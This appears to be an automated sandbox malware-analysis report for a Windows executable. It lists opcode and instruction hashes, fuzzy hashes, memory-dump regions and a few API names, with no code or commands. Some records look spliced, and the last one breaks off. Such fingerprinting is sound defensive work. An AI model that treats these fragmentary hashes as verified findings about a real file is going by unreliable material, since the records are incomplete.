                                                                                                                                      • Opcode ID: 30e81f81e658687627774e49a4215a66210198522cd3643bad6ecd86dde99f54
                                                                                                                                      • Instruction ID: 1a02c89ee3a1a71f3c9d4d54e369d2a1a9a37402f38aa422231637dc74127d18
                                                                                                                                      • Opcode Fuzzy Hash: 30e81f81e658687627774e49a4215a66210198522cd3643bad6ecd86dde99f54
                                                                                                                                      • Instruction Fuzzy Hash: C811E3B9C002899FDB10DF9AD444BDEFBF4EB49314F11851AD429B7210C375A545CFA5
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 959018026-0
                                                                                                                                      • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                      • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                      • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                      • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                      APIs
                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq
                                                                                                                                      • API String ID: 0-1999159160
                                                                                                                                      • Opcode ID: 8467f14f4e27209dffc05d29b70a9a9c2e241f01a6d688327080ab08362cbe8d
                                                                                                                                      • Instruction ID: 7866ea147c7235a95e78f34ac81188a9a7c586834146877521d36b3589417210
                                                                                                                                      • Opcode Fuzzy Hash: 8467f14f4e27209dffc05d29b70a9a9c2e241f01a6d688327080ab08362cbe8d
                                                                                                                                      • Instruction Fuzzy Hash: 1441E531B042049FDB189F68D8587AE7BF6AFCC611F144429E916EB390DF359C16CBA4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 615489a7bb691acc18ecfdd00b177de029784addc2250a2d8aa1e47a1323ddb4
                                                                                                                                      • Instruction ID: da357c53635fae8f5138f5ce0b2fe97cfe195d71a9173712b6e14d04b70ffe2d
                                                                                                                                      • Opcode Fuzzy Hash: 615489a7bb691acc18ecfdd00b177de029784addc2250a2d8aa1e47a1323ddb4
                                                                                                                                      • Instruction Fuzzy Hash: E651D274D01318DFDB28DFA5D898BADBBB2BF88305F604129D806AB294DB356956CF40
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 360bf07c5e552d8b3e4b96622819e66e78c86acc2bb4b61fb6fc24089045a1cb
                                                                                                                                      • Instruction ID: 56dffb9d3755052320cb35f7054031c874e7321d60024c4ba1a1f3a588060da2
                                                                                                                                      • Opcode Fuzzy Hash: 360bf07c5e552d8b3e4b96622819e66e78c86acc2bb4b61fb6fc24089045a1cb
                                                                                                                                      • Instruction Fuzzy Hash: 88511C7DB00116DFE758DF28E48496A77B2BB483187014966EC22DF369DB34EC42CB90
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fa69c32cd6c1773ac9a3af3821bf04bd7026411e551b0b369f3539538ea459bf
                                                                                                                                      • Instruction ID: 46141bbd9d73a7e11e8442a093097e17ba9e8cd1c5ea2113bc6f3c469145ca35
                                                                                                                                      • Opcode Fuzzy Hash: fa69c32cd6c1773ac9a3af3821bf04bd7026411e551b0b369f3539538ea459bf
                                                                                                                                      • Instruction Fuzzy Hash: 3B51F374E002098FCB44DFA9D595AEEBBF2FF88300F20802AD509AB3A4D7345E45CB94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: cc10d2ff895f8f050359bab2b42321ceb276e010dd9ed27337c2cda491ccb61c
                                                                                                                                      • Instruction ID: 6cb017fea78d8b35005a93982dd9b32bbf6b588db5ddd3d409537f92cf1f6102
                                                                                                                                      • Opcode Fuzzy Hash: cc10d2ff895f8f050359bab2b42321ceb276e010dd9ed27337c2cda491ccb61c
                                                                                                                                      • Instruction Fuzzy Hash: B951B674E01208DFDB48DFA9D884A9DBBF2FF89310F248169E415AB364DB31A901CF40
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: efec105837ebaac31bee041ef928bf02413870fadfee168af52f973d8732e00e
                                                                                                                                      • Instruction ID: 4a2999b2a9f2ba8dcf766f7a61f28f07065c6f80b17f32483e6ec36859bbf198
                                                                                                                                      • Opcode Fuzzy Hash: efec105837ebaac31bee041ef928bf02413870fadfee168af52f973d8732e00e
                                                                                                                                      • Instruction Fuzzy Hash: BF519074E01208CFCB58DFA9D59499DBBF2FF89310F209469E805AB368DB35A856CF50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f86b364fb3f98c1b618ee9b044f71b9b2cdd89441d08873348ccea87ace41961
                                                                                                                                      • Instruction ID: 316c988cbf6160ba4b0a206b5faebd09f60017d95e9c52966b3397e0ca429987
                                                                                                                                      • Opcode Fuzzy Hash: f86b364fb3f98c1b618ee9b044f71b9b2cdd89441d08873348ccea87ace41961
                                                                                                                                      • Instruction Fuzzy Hash: 80414B74E012088FDB44DFAAD9406EEBBF2AF89300F64902AC818B7355DB759E42CF54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ec08782059b525e569c8dbc355acb3f301b8c77ea01070a92c74b130b342368b
                                                                                                                                      • Instruction ID: 986ea75df51405452f2f50df06b8766249a60d59662c51b7c7e4b637dbb1afd5
                                                                                                                                      • Opcode Fuzzy Hash: ec08782059b525e569c8dbc355acb3f301b8c77ea01070a92c74b130b342368b
                                                                                                                                      • Instruction Fuzzy Hash: 5B41A031A44249DFCF15CFA8C848BFEBFB2AF49314F158065E855AB265D334E865CBA0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 214cb9cf13c24b9e3f388af5f09ee386d1f46f00f253c900c72e9cce02477675
                                                                                                                                      • Instruction ID: d7ede347c90fcf0774c1510cac5d16102b0a0465d74776419342378545a768e2
                                                                                                                                      • Opcode Fuzzy Hash: 214cb9cf13c24b9e3f388af5f09ee386d1f46f00f253c900c72e9cce02477675
                                                                                                                                      • Instruction Fuzzy Hash: A9414231E003199BDB54DFA9C890BDEBBF6AF89700F249119E511B7280EB70AD46CBD0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 693a42a1fc47477670f8f0c295f6de078dc286366699a73dc068309f86b74315
                                                                                                                                      • Instruction ID: 59ac742672e6a0f8af32f01d4d4af99bed58f580b8e77f9c947eda8002c96e4e
                                                                                                                                      • Opcode Fuzzy Hash: 693a42a1fc47477670f8f0c295f6de078dc286366699a73dc068309f86b74315
                                                                                                                                      • Instruction Fuzzy Hash: 7441F571A40208DFDB15DF64C808B7EBBB6EF48314F0584AAE8159B291D774DD56CFA0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a564121a037eb096dd2b1d0dbb0a6774f0561a4fc309673ddd33c8e36ca93349
                                                                                                                                      • Instruction ID: d0f0451d4c986db37599d26f5cdc8f7949124f9b38bfc1e6653e8dbdcdfadc62
                                                                                                                                      • Opcode Fuzzy Hash: a564121a037eb096dd2b1d0dbb0a6774f0561a4fc309673ddd33c8e36ca93349
                                                                                                                                      • Instruction Fuzzy Hash: 38318C3174510AAFCF059FA8D85CABE7BB7FB88301F448829F9058B254CB35C925DB94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6f1af13cf925ac9304425b3ce40fde110c6ed9419e284b1db72a646a60ee0687
                                                                                                                                      • Instruction ID: 142d7b6f3c072f698e5b001471295de0c953f754473123756e4f9efb3c1de763
                                                                                                                                      • Opcode Fuzzy Hash: 6f1af13cf925ac9304425b3ce40fde110c6ed9419e284b1db72a646a60ee0687
                                                                                                                                      • Instruction Fuzzy Hash: D431C675E012088FDB54DFAAD9906EEBBF2AF89300F24D12AC419BB354DB345A42CF54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d7bd1943caa3972c60e9fd3e13b662a2fe1d23f572a569d6d4864588b7f432f8
                                                                                                                                      • Instruction ID: 7dc1dc295e17d47866a0593a7e1f47542c49105fe4aa858a6ac5b14dd190a5ff
                                                                                                                                      • Opcode Fuzzy Hash: d7bd1943caa3972c60e9fd3e13b662a2fe1d23f572a569d6d4864588b7f432f8
                                                                                                                                      • Instruction Fuzzy Hash: 2831F275E01258CFDB58DFAAD8506EEBBB2BF89300F14D02AC819BB255DB354942CF94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 340e4d408958ad53f76cb16847184f705cb098a8964b81f8253db7c08f14e2ef
                                                                                                                                      • Instruction ID: 867419b63136d85e0374d612f4f7aeb3ef06a29982afe6d320a04b465d48d809
                                                                                                                                      • Opcode Fuzzy Hash: 340e4d408958ad53f76cb16847184f705cb098a8964b81f8253db7c08f14e2ef
                                                                                                                                      • Instruction Fuzzy Hash: 2A3104B5D012199FCB50CFA9D884BDEFBF4EB48720F24806AE918AB241D7749945CBA4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4c46930a12fa3a3c1d9a784086904e87170dfbae70311bde34da1ccc0bb6884d
                                                                                                                                      • Instruction ID: d712d518559bd5d14082576e51333133628e16bf01dd076a043a115f5395213c
                                                                                                                                      • Opcode Fuzzy Hash: 4c46930a12fa3a3c1d9a784086904e87170dfbae70311bde34da1ccc0bb6884d
                                                                                                                                      • Instruction Fuzzy Hash: AB1108317083841FDB0A6F7898256AE3FB3EFC9210B44546EE546DB392CE344D12C7AA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3948e5234686eaf6ef4f7af3b23ae09bfce3e3c7639ba312b0a9c53c2e233b9b
                                                                                                                                      • Instruction ID: cfce6261cfb5046f6d7102d48f43203378596668917a41283d99dac9b79117b7
                                                                                                                                      • Opcode Fuzzy Hash: 3948e5234686eaf6ef4f7af3b23ae09bfce3e3c7639ba312b0a9c53c2e233b9b
                                                                                                                                      • Instruction Fuzzy Hash: 6F218070E4021DDBEB18DFA1DA48BBEBBB6FF44304F104029E401AB254DB75A951DB90
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2bf47e2622b12851928c5c77b35a001a956e67db7e7a20f4873e97733149b596
                                                                                                                                      • Instruction ID: d736abfdc2c52292c9f0da468a31b68028988c0da0ad00df27b3e0d054816552
                                                                                                                                      • Opcode Fuzzy Hash: 2bf47e2622b12851928c5c77b35a001a956e67db7e7a20f4873e97733149b596
                                                                                                                                      • Instruction Fuzzy Hash: 8F318378E01308CFCB58DFA8E59499DBBB2FF49301B209469E819AB324DB31AD05CF00
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 239fb321b39b2b12f00a6609024fda8be131e09ad80514c6280e80eb36228803
                                                                                                                                      • Instruction ID: 866e4a3155dd69e96c7d858910372eaf6d668592a2b6d3ee35d89cc9d9ee88ef
                                                                                                                                      • Opcode Fuzzy Hash: 239fb321b39b2b12f00a6609024fda8be131e09ad80514c6280e80eb36228803
                                                                                                                                      • Instruction Fuzzy Hash: 262115B5C012199FCB50CF99D884BDEFBF4EB48320F14806AE918AB340D7749944CFA0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d17ab2579653cbaf6e0ef16b55942f7a26dd4bd8c5f2eeee54e0cdcbd84e74e5
                                                                                                                                      • Instruction ID: a24d2698ee60d4196ae62dd1b09eecb5b772806f007c5a93cf98cef9fa7a7f0e
                                                                                                                                      • Opcode Fuzzy Hash: d17ab2579653cbaf6e0ef16b55942f7a26dd4bd8c5f2eeee54e0cdcbd84e74e5
                                                                                                                                      • Instruction Fuzzy Hash: 1A219330D00209DFDB00EFA9D545A9EBBF2FB84300F00D5A9D005AB269EB705A0ADB81
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 979b4b84ee96d3554d1f7e6cd8cbdded02f5a46705910107bf7130c02ec5e9b6
                                                                                                                                      • Instruction ID: 4614cdf7576e77cda2656dd32bd0fabacd498b045e18001bd68cf16332a369db
                                                                                                                                      • Opcode Fuzzy Hash: 979b4b84ee96d3554d1f7e6cd8cbdded02f5a46705910107bf7130c02ec5e9b6
                                                                                                                                      • Instruction Fuzzy Hash: 3F11A170C8A248DFCB15CFB9E4592BDBBB9EF46304F2461EAD40A63641D7304A62CB84
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 20845ea856ec31f847c4f544cd6cbfdf53d7a09333e5e84e13e25697ea746e09
                                                                                                                                      • Instruction ID: 907326f12d462521afeb5931ea35bb0f061d65dfe6e7994938052d18ca0089a3
                                                                                                                                      • Opcode Fuzzy Hash: 20845ea856ec31f847c4f544cd6cbfdf53d7a09333e5e84e13e25697ea746e09
                                                                                                                                      • Instruction Fuzzy Hash: 65119370E00259DBEF18DF65DA58BEEBBB6BF41300F14452DD842AB394DB719841CB54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 68179da7aa1c5329016b76290f530150c2d5edf0906b80c1ace183cefc253bcc
                                                                                                                                      • Instruction ID: c8020cda33500888cc26aa55ebbf880827cc4ad606cffef59dedda6ce254e658
                                                                                                                                      • Opcode Fuzzy Hash: 68179da7aa1c5329016b76290f530150c2d5edf0906b80c1ace183cefc253bcc
                                                                                                                                      • Instruction Fuzzy Hash: 4F21D0B0D446098FCB04DFA8C9885EEBFF0BF09204F10556AD845F3264EB315A99CBA5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 98136982113735765df3e6492d5e10d40ac534fd87b63f3a663cc596e18ed2a0
                                                                                                                                      • Instruction ID: e3ae872f3b8cd65c3791a0b53cc7e65c4269a45d32926a9101f2d9bb8d827adf
                                                                                                                                      • Opcode Fuzzy Hash: 98136982113735765df3e6492d5e10d40ac534fd87b63f3a663cc596e18ed2a0
                                                                                                                                      • Instruction Fuzzy Hash: 5A1156768003499FDB10DF9AC845BDEBBF4EB48320F148419EA18A7650C339A950DFA5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e296b1c760286662b34a6ddb6f3100957aa0649199bfb7e62915077308e53416
                                                                                                                                      • Instruction ID: 1ccac9538bd3302d647f822e4f252da2e62c3ac9fd4ce52eb1cef1de759df7c2
                                                                                                                                      • Opcode Fuzzy Hash: e296b1c760286662b34a6ddb6f3100957aa0649199bfb7e62915077308e53416
                                                                                                                                      • Instruction Fuzzy Hash: D31176B6800209DFDB10DF9AC945BDEBFF5EF48320F248419E618A7250C339A551DFA0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 73fc3d2357291078e16b9ce7aa918c138ed95f6e4701e2c2cd798666e853066a
                                                                                                                                      • Instruction ID: 429d888f4263ce2e12d07ec2574e7d375f5c673fbdfabac95104034516e5f88c
